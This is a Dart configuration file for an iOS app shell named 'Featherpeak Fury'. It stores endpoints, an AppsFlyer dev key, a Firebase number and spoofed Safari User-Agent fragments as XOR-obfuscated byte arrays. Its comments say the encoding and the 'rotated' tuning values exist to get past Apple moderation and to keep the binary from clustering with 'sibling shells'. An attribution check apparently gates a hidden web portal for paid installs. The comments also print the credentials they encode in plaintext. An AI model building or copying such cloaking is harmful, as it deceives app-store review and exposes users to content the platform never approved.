import '../keep/plume_cipher.dart';

// All Featherpeak Fury shell configuration lives in this file. Sensitive
// strings (endpoints, dev keys, UA scaffolding) live as position-XORed byte
// arrays produced by `tool/forge_crest_values.dart`. Public strings that
// already appear verbatim in App Store Connect (privacy + support pages)
// stay as plaintext const — encoding them would only prove the binary has
// decoder infrastructure without hiding anything.
abstract final class CrestConfig {
  // ────────────────────────────────────────────────────────────────────
  // App identity
  // ────────────────────────────────────────────────────────────────────
  static String get bundleId => unfurl(_bundleId);
  static String get appNameToken => unfurl(_appName);
  static const String iosStoreNumericId = '6802345538';
  static String get platformStoreId => 'id$iosStoreNumericId';

  // ────────────────────────────────────────────────────────────────────
  // Backend
  // ────────────────────────────────────────────────────────────────────
  static String get configEndpoint => unfurl(_configEndpoint);
  static String get gcdBase => unfurl(_gcdBase);

  // ────────────────────────────────────────────────────────────────────
  // AppsFlyer + Firebase
  // ────────────────────────────────────────────────────────────────────
  static String get appsFlyerDevKey => unfurl(_appsFlyerDevKey);
  static String get oneLinkHost => unfurl(_oneLinkHost);
  static String get firebaseProjectNumber => unfurl(_firebaseProjectNumber);

  // ────────────────────────────────────────────────────────────────────
  // Public URLs (App Store Connect visible) — plaintext by policy.
  // ────────────────────────────────────────────────────────────────────
  static const String privacyUrl =
      'https://featherpeakfury.com/privacy-policy.html';
  static const String supportUrl =
      'https://featherpeakfury.com/support.html';

  // ────────────────────────────────────────────────────────────────────
  // User-Agent fragments — every scaffolding substring lives here so the
  // literal 'Mozilla/5.0 (iPhone; CPU iPhone OS ' does not survive in the
  // binary.  Assembled in `device_agent.dart`.
  // ────────────────────────────────────────────────────────────────────
  static String get uaProduct => unfurl(_uaProduct);
  static String get uaPlatformPrefix => unfurl(_uaPlatformPrefix);
  static String get uaPlatformSuffix => unfurl(_uaPlatformSuffix);
  static String get uaEngine => unfurl(_uaEngine);
  static String get uaMobileToken => unfurl(_uaMobileToken);
  static String get safariVersion => unfurl(_safariVersion);
  static String get safariTail => unfurl(_safariTail);

  // Slot suffix.  The operator explicitly acknowledged the tail
  //   `appid/<bundleId> appname/FeatherpeakFury`
  // as required by the partner backend (`gray_user_agent.mdc` §2a step 3).
  // Both tokens are encoded, so no plaintext `appid/` or `appname/` string
  // appears in the binary either.
  static String get uaAppIdToken => unfurl(_uaAppIdToken);
  static String get uaAppNameToken => unfurl(_uaAppNameToken);

  // ────────────────────────────────────────────────────────────────────
  // Runtime tuning — every number below is rotated off the template
  // default so the binary does not cluster with sibling shells (see
  // `apple_moderation_hardening.mdc` §7a).
  // ────────────────────────────────────────────────────────────────────
  static const int pushSnoozeSeconds = 386400;      // ~4.5 days
  // Wait before re-reading attribution via the GCD API when the SDK
  // reports Organic on the first callback (paid installs sometimes race
  // to this verdict on cold boot).  See `_takeInstall` in `flight_signals`.
  static const int organicRecheckSeconds = 3;
  static const Duration configPostTimeout = Duration(seconds: 11);
  static const Duration gcdLookupTimeout = Duration(seconds: 6);
  // Must cover: initial SDK callback + organicRecheckSeconds + gcdLookupTimeout
  // with a small safety margin.  Bump this together with the two above.
  static const Duration awaitSignalsTimeout = Duration(seconds: 12);
  static const Duration attPromptDelay = Duration(milliseconds: 420);
  static const int redirectRetryLimit = 4;
  static const int apnsPollAttempts = 6;
  static const Duration apnsPollStep = Duration(milliseconds: 620);
  static const Duration postFinishedResizeDelay = Duration(milliseconds: 480);
  static const List<int> reflowSchedule = <int>[55, 190, 380, 620, 940];
  static const Duration coldViewportSettle = Duration(milliseconds: 360);
  static const int savedUrlExpiryDays = 5;

  // The pipeline runs only when we have the three credentials it needs.
  // OneLink is optional — never gate on it (see gray_flow_lessons §4).
  static bool get portalCredentialsReady =>
      configEndpoint.startsWith('https://') &&
      appsFlyerDevKey.length >= 8 &&
      firebaseProjectNumber.length >= 6;

  // ==== Encoded byte arrays — generated by tool/forge_crest_values.dart ====
  // Regenerate all of them together after touching `plume_cipher.dart`.

  // VERIFY configEndpoint = "https://featherpeakfury.com/config.php"
  static const List<int> _configEndpoint = <int>[
    230, 221, 14, 232, 143, 214, 137, 111, 70, 99, 144, 147, 195, 233, 37,
    205, 167, 179, 235, 8, 114, 83, 215, 174, 166, 141, 92, 236, 196, 216,
    131, 109, 52, 28, 162, 218, 142, 177,
  ];
  // VERIFY appsFlyerDevKey = "pm2vb9YkvU9sNLRVWVnKED"
  static const List<int> _appsFlyerDevKey = <int>[
    254, 196, 72, 238, 158, 213, 255, 43, 86, 83, 200, 148, 229, 192, 5, 235,
    149, 132, 238, 37, 66, 101,
  ];
  // VERIFY firebaseProjectNumber = "951687956128"
  static const List<int> _firebaseProjectNumber = <int>[
    183, 156, 75, 174, 196, 219, 159, 117, 22, 55, 195, 223,
  ];
  // VERIFY oneLinkHost = "featherpeakfury.onelink.me"
  static const List<int> _oneLinkHost = <int>[
    232, 204, 27, 236, 148, 137, 212, 48, 69, 103, 154, 129, 222, 254, 46,
    147, 173, 188, 229, 2, 110, 79, 197, 174, 168, 135,
  ];
  // VERIFY gcdBase = "https://gcdsdk.appsflyer.com"
  static const List<int> _gcdBase = <int>[
    230, 221, 14, 232, 143, 214, 137, 111, 71, 101, 149, 148, 207, 231, 121,
    220, 178, 162, 243, 8, 107, 88, 203, 242, 235, 129, 94, 174,
  ];
  // VERIFY bundleId = "com.featherpeakfury.featherpeakfurygame"
  static const List<int> _bundleId = <int>[
    237, 198, 23, 182, 154, 137, 199, 52, 72, 99, 131, 151, 206, 237, 60,
    219, 183, 160, 249, 64, 97, 68, 207, 244, 173, 135, 67, 179, 194, 214,
    134, 109, 40, 9, 245, 205, 135, 172, 111,
  ];
  // VERIFY appName = "FeatherpeakFury"
  static const List<int> _appName = <int>[
    200, 204, 27, 236, 148, 137, 212, 48, 69, 103, 154, 161, 222, 254, 46,
  ];
  // VERIFY uaProduct = "Mozilla/5.0"
  static const List<int> _uaProduct = <int>[
    195, 198, 0, 241, 144, 128, 199, 111, 21, 40, 193,
  ];
  // VERIFY uaPlatformPrefix = "(iPhone; CPU iPhone OS"
  static const List<int> _uaPlatformPrefix = <int>[
    166, 192, 42, 240, 147, 130, 195, 123, 0, 69, 161, 178, 139, 229, 7, 213,
    173, 188, 229, 78, 72, 114,
  ];
  // VERIFY uaPlatformSuffix = "like Mac OS X)"
  static const List<int> _uaPlatformSuffix = <int>[
    226, 192, 17, 253, 220, 161, 199, 35, 0, 73, 162, 199, 243, 165,
  ];
  // VERIFY uaEngine = "AppleWebKit/605.1.15 (KHTML, like Gecko)"
  static const List<int> _uaEngine = <int>[
    207, 217, 10, 244, 153, 187, 195, 34, 107, 111, 133, 200, 157, 188, 98,
    147, 243, 252, 177, 91, 39, 9, 229, 200, 145, 175, 125, 239, 135, 219,
    132, 96, 56, 91, 203, 207, 133, 170, 101, 201,
  ];
  // VERIFY uaMobileToken = "Mobile/15E148"
  static const List<int> _uaMobileToken = <int>[
    195, 198, 24, 241, 144, 137, 137, 113, 21, 67, 192, 211, 147,
  ];
  // VERIFY safariVersion = "18.2"
  static const List<int> _safariVersion = <int>[191, 145, 84, 170];
  // VERIFY safariTail = "604.1"
  static const List<int> _safariTail = <int>[184, 153, 78, 182, 205];
  // VERIFY uaAppIdToken = "appid/"
  static const List<int> _uaAppIdToken = <int>[239, 217, 10, 241, 152, 195];
  // VERIFY uaAppNameToken = "appname/"
  static const List<int> _uaAppNameToken = <int>[
    239, 217, 10, 246, 157, 129, 195, 111,
  ];
}
